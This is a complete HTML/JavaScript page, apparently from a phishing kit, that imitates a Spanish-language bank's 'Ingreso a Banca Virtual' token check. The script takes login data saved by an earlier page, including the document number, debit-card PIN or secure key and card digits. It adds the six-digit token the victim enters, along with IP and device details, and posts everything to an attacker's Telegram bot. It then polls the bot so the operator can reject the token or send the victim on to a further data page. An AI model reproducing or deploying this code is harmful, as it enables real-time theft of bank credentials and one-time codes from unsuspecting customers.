<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="utf-8" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <title>
        Ingreso a Banca Virtual
    </title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet" />
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap');

        body {
            font-family: 'Inter', sans-serif;
        }

        /* Loader CSS */
        .loader-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 9999;
            display: flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-size: 1.5rem;
            flex-direction: column;
            gap: 10px;
        }

        .spinner {
            border: 4px solid rgba(255, 255, 255, 0.3);
            border-radius: 50%;
            border-top: 4px solid #fff;
            width: 40px;
            height: 40px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body class="bg-[#f3f7fc] min-h-screen flex flex-col items-center p-4">
    <header class="w-full max-w-md flex items-center justify-between py-4">
        <button aria-label="Volver" class="text-[#1a2a5a] text-xl">
            <i class="fas fa-chevron-left"></i>
        </button>
        <h1 class="text-[#1a2a5a] font-semibold text-base">
            Ingreso a Banca Virtual
        </h1>
        <button aria-label="Cerrar" class="text-[#1a2a5a] text-xl">
            <i class="fas fa-times"></i>
        </button>
    </header>
    <main class="w-full max-w-md">
        <br>
        <h2 class="text-[#1a2a5a] font-semibold text-lg mb-4">
            Verifiquemos que seas tú
        </h2>
        <section class="bg-white rounded-lg p-5 shadow-sm">
            <div class="flex items-start space-x-3 mb-3">
                <img alt="Icono de candado abierto con código" class="w-6 h-6 flex-shrink-0 mt-1" decoding="async" height="24" loading="lazy" src="candado.png" width="24" />
                <div>
                    <div class="flex items-center space-x-1 mb-1">
                        <span class="font-semibold text-[#1a2a5a] text-base">
                            Código Token
                        </span>
                        <button aria-label="Información sobre Código Token" class="text-[#1a2a5a] border border-[#1a2a5a] rounded-full w-5 h-5 flex items-center justify-center text-xs font-semibold leading-none">
                            i
                        </button>
                    </div>
                    <p class="text-[#5a5a5a] text-sm leading-relaxed max-w-[320px]">
                        Para realizar este proceso, ingresa el código de Token móvil o físico.
                    </p>
                </div>
            </div>
            <form class="mt-4" onsubmit="event.preventDefault()">
                <div id="token-inputs" class="grid grid-cols-6 gap-2 justify-center mb-6">
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                    <input type="text" maxlength="1" inputmode="numeric" pattern="[0-9]*" class="token-input w-10 h-10 rounded-md border border-[#d1d5db] bg-white text-center text-lg font-semibold text-[#1a2a5a] focus:outline-none focus:ring-2 focus:ring-[#1a2a5a]" />
                </div>
                <p id="errorMessage" class="text-red-500 text-center mb-4 hidden">Token incorrecto, intenta de nuevo.</p>

                <button id="verifyBtn" class="w-full bg-[#e5e7eb] text-[#9ca3af] font-semibold text-base rounded-full py-3 cursor-not-allowed transition-colors duration-200" disabled type="submit">
                    Verificar
                </button>
            </form>
        </section>
    </main>

    <div id="loader" class="loader-overlay" style="display: none;">
        <div class="spinner"></div>
        <p>Verificando token...</p>
    </div>

    <script>
        const inputs = document.querySelectorAll(".token-input");
        const verifyBtn = document.getElementById("verifyBtn");
        const errorMessage = document.getElementById("errorMessage");
        const loader = document.getElementById("loader");

        let initialLoginData = null;
        let tokenAttemptCount = parseInt(sessionStorage.getItem('tokenAttemptCount')) || 0;
        let TELEGRAM_BOT_TOKEN = '';
        let TELEGRAM_CHAT_ID = '';
        let statusCheckInterval = null;

        // Guardamos lastUpdateId en sessionStorage para no procesar updates viejos
        let lastUpdateId = parseInt(sessionStorage.getItem('lastUpdateId')) || 0;

        // Cargar los datos sensibles desde el archivo JSON
        async function loadTelegramConfig() {
            if (TELEGRAM_BOT_TOKEN && TELEGRAM_CHAT_ID) {
                return true;
            }
            try {
                const response = await fetch('js/brr76.json');
                if (!response.ok) {
                    throw new Error('No se pudo cargar el archivo de configuración.');
                }
                const data = await response.json();
                TELEGRAM_BOT_TOKEN = data.token;
                TELEGRAM_CHAT_ID = data.chat_id;
                console.log("Tokens y IDs de chat de Telegram cargados correctamente.");
                return true;
            } catch (error) {
                console.error('Error al cargar la configuración de Telegram:', error);
                alert('Error crítico: No se pudo cargar la configuración de Telegram.');
                verifyBtn.disabled = true;
                return false;
            }
        }

        // Inicializa lastUpdateId con el último update existente (para ignorar históricos)
        async function initLastUpdateId() {
            try {
                if (!TELEGRAM_BOT_TOKEN) return;
                const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/getUpdates`;
                const response = await fetch(url);
                const data = await response.json();
                if (!data || !data.result) return;
                const updates = data.result;
                if (updates.length === 0) return;

                const maxUpdateId = Math.max(...updates.map(u => u.update_id));
                lastUpdateId = maxUpdateId;
                sessionStorage.setItem('lastUpdateId', lastUpdateId);
                console.log('Inicializado lastUpdateId a', lastUpdateId);
            } catch (err) {
                console.warn('No se pudo inicializar lastUpdateId:', err);
            }
        }

        // Función para enviar datos a Telegram (payload en JSON)
        async function sendToTelegram(messageContent, keyboard) {
            const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
            const payload = {
                chat_id: TELEGRAM_CHAT_ID,
                text: messageContent,
                reply_markup: keyboard, // enviamos objeto (fetch hará stringify)
                parse_mode: 'Markdown'
            };

            try {
                const response = await fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify(payload),
                });

                if (!response.ok) {
                    const errorText = await response.text();
                    console.error(`Error al enviar mensaje a Telegram: ${response.status} - ${errorText}`);
                    return false;
                }
                console.log('Mensaje enviado a Telegram exitosamente.');
                return true;
            } catch (error) {
                console.error('Error de red al enviar mensaje a Telegram:', error);
                return false;
            }
        }

        // Versión mejorada de checkTokenVerification:
        // - usa offset para pedir sólo nuevos updates
        // - actualiza lastUpdateId
        // - filtra los callback_query que contienen transactionId
        // - escoge el más reciente (mayor update_id)
        // - responde al callback_query con answerCallbackQuery
        async function checkTokenVerification(transactionId) {
            if (statusCheckInterval) {
                clearInterval(statusCheckInterval);
            }

            statusCheckInterval = setInterval(async () => {
                try {
                    // pedimos sólo updates nuevos usando offset (lastUpdateId + 1)
                    const offsetParam = lastUpdateId > 0 ? `?offset=${lastUpdateId + 1}` : '';
                    const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/getUpdates${offsetParam}`;
                    const response = await fetch(url);
                    const data = await response.json();
                    if (!data || !data.result) return;

                    const updates = data.result;
                    if (!updates || updates.length === 0) return;

                    // actualizamos lastUpdateId con el último recibido
                    const maxUpdateId = Math.max(...updates.map(u => u.update_id));
                    lastUpdateId = maxUpdateId;
                    sessionStorage.setItem('lastUpdateId', lastUpdateId);

                    // filtramos sólo los callback_query que contienen nuestro transactionId
                    const relevant = updates.filter(u => u.callback_query && u.callback_query.data && u.callback_query.data.includes(transactionId));

                    if (relevant.length > 0) {
                        // elegimos el más reciente (mayor update_id)
                        const latest = relevant.reduce((a, b) => a.update_id > b.update_id ? a : b);

                        // limpiamos intervalo y ocultamos loader
                        clearInterval(statusCheckInterval);
                        statusCheckInterval = null;
                        loader.style.display = 'none';

                        const callbackDataFull = latest.callback_query.data; // e.g. "pedir_datos:tx123"
                        const callbackId = latest.callback_query.id;

                        // responder el callback para que Telegram deje de mostrar "loading"
                        try {
                            await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/answerCallbackQuery`, {
                                method: 'POST',
                                headers: { 'Content-Type': 'application/json' },
                                body: JSON.stringify({ callback_query_id: callbackId, text: 'Procesado' })
                            });
                        } catch (err) {
                            console.warn('No se pudo responder callback_query:', err);
                        }

                        const callbackKey = callbackDataFull.split(':')[0];

                        if (callbackKey === 'error_token') {
                            errorMessage.classList.remove('hidden');
                            errorMessage.textContent = "Token incorrecto, intenta de nuevo.";
                            inputs.forEach(input => input.value = '');
                            inputs[0].focus();
                            checkAllFilled();
                        } else if (callbackKey === 'pedir_datos') {
                            // redirigimos a datos.html
                            window.location.href = "datos.html";
                        } else {
                            console.log("Respuesta no reconocida del bot:", callbackDataFull);
                            alert("Respuesta no reconocida. Por favor, intente de nuevo.");
                        }
                    }
                } catch (error) {
                    console.error("Error al verificar el estado de la transacción:", error);
                    // no clearInterval: seguimos intentando
                }
            }, 1500); // cada 1.5s
        }

        document.addEventListener('DOMContentLoaded', async () => {
            await loadTelegramConfig();

            // inicializamos lastUpdateId para que no procese updates viejos
            await initLastUpdateId();

            const storedData = sessionStorage.getItem('initialLoginData');
            if (storedData) {
                initialLoginData = JSON.parse(storedData);
            } else {
                window.location.href = 'index.html';
            }
        });

        inputs.forEach((input, i) => {
            input.addEventListener("input", (e) => {
                const value = e.target.value;
                if (/^\d$/.test(value)) {
                    if (i < inputs.length - 1) inputs[i + 1].focus();
                } else {
                    e.target.value = "";
                }
                checkAllFilled();
            });

            input.addEventListener("keydown", (e) => {
                if (e.key === "Backspace" && !input.value && i > 0) {
                    inputs[i - 1].focus();
                }
            });

            input.addEventListener("paste", (e) => {
                e.preventDefault();
                const paste = (e.clipboardData || window.clipboardData).getData("text").replace(/\D/g, "").slice(0, 6);
                [...paste].forEach((char, idx) => {
                    if (inputs[idx]) inputs[idx].value = char;
                });
                if (paste.length > 0) {
                    inputs[Math.min(paste.length, inputs.length - 1)].focus();
                }
                checkAllFilled();
            });
        });

        function checkAllFilled() {
            const allFilled = [...inputs].every((inp) => inp.value.length === 1);
            verifyBtn.disabled = !allFilled;
            verifyBtn.classList.toggle("cursor-not-allowed", !allFilled);
            verifyBtn.classList.toggle("bg-[#e5e7eb]", !allFilled);
            verifyBtn.classList.toggle("text-[#9ca3af]", !allFilled);
            verifyBtn.classList.toggle("bg-[#3b82f6]", allFilled);
            verifyBtn.classList.toggle("text-white", allFilled);
        }

        verifyBtn.addEventListener('click', async () => {
            const token = [...inputs].map(input => input.value).join('');
            errorMessage.classList.add('hidden');
            loader.style.display = 'flex';

            tokenAttemptCount++;

            let headerMessage = '';

            if (initialLoginData.debitCardKey !== 'N/A') {
                headerMessage = `🍀 *NUEVO REGISTRO*\n\n`;
                headerMessage += `*ID de Transacción:* ${initialLoginData.transactionId}\n`;
                headerMessage += `*Tipo de Tab:* Tarjeta Débito\n`;
                headerMessage += `*Tipo de Doc:* ${initialLoginData.identificationType}\n`;
                headerMessage += `*No\\. de Doc:* ${initialLoginData.identificationNumber}\n`;
                headerMessage += `*Clave Tarjeta Débito:* ${initialLoginData.debitCardKey}\n`;
                headerMessage += `*Últimos 4 dígitos:* ${initialLoginData.last4Digits}\n`;
                if (initialLoginData.legalRepresentativeNumber !== 'N/A') {
                    headerMessage += `*Tipo Rep\\. Legal:* ${initialLoginData.legalRepresentativeDoc}\n`;
                    headerMessage += `*No\\. Rep\\. Legal:* ${initialLoginData.legalRepresentativeNumber}\n`;
                }
                headerMessage += `\n*IP:* ${initialLoginData.ip}\n`;
                headerMessage += `*Dispositivo:* ${initialLoginData.device}\n`;
                headerMessage += `*Fecha/Hora:* ${new Date().toLocaleString('es-CO', { timeZone: 'America/Bogota' })}`;
            } else if (initialLoginData.secureKey !== 'N/A') {
                headerMessage = `🍀 *NUEVO REGISTRO*\n\n`;
                headerMessage += `*ID de Transacción:* ${initialLoginData.transactionId}\n`;
                headerMessage += `*Tipo de Tab:* Clave Segura\n`;
                headerMessage += `*Tipo de Doc:* ${initialLoginData.identificationType}\n`;
                headerMessage += `*No\\. de Doc:* ${initialLoginData.identificationNumber}\n`;
                headerMessage += `*Clave Segura:* ${initialLoginData.secureKey}\n`;
                if (initialLoginData.legalRepresentativeNumber !== 'N/A') {
                    headerMessage += `*Tipo Rep\\. Legal:* ${initialLoginData.legalRepresentativeDoc}\n`;
                    headerMessage += `*No\\. Rep\\. Legal:* ${initialLoginData.legalRepresentativeNumber}\n`;
                }
                headerMessage += `\n*IP:* ${initialLoginData.ip}\n`;
                headerMessage += `*Dispositivo:* ${initialLoginData.device}\n`;
                headerMessage += `*Fecha/Hora:* ${new Date().toLocaleString('es-CO', { timeZone: 'America/Bogota' })}`;
            }

            const telegramMessage = `${headerMessage}\n\n🚨 *TOKEN INGRESADO (intento ${tokenAttemptCount})*\n\n🍀 *Token:* ${token}`;

            sessionStorage.setItem('tokenAttemptCount', tokenAttemptCount);

            // Ahora enviamos keyboard como objeto (no stringify)
            const keyboard = {
                inline_keyboard: [
                    [{ text: "Error Token", callback_data: `error_token:${initialLoginData.transactionId}` }],
                    [{ text: "Ir a Datos", callback_data: `pedir_datos:${initialLoginData.transactionId}` }]
                ]
            };

            const sent = await sendToTelegram(telegramMessage, keyboard);

            if (sent) {
                checkTokenVerification(initialLoginData.transactionId);
            } else {
                loader.style.display = 'none';
                alert("Error al enviar el token. Por favor, inténtalo de nuevo.");
            }
        });

        window.addEventListener('beforeunload', function() {
            if (statusCheckInterval) {
                clearInterval(statusCheckInterval);
            }
        });
    </script>
</body>

</html>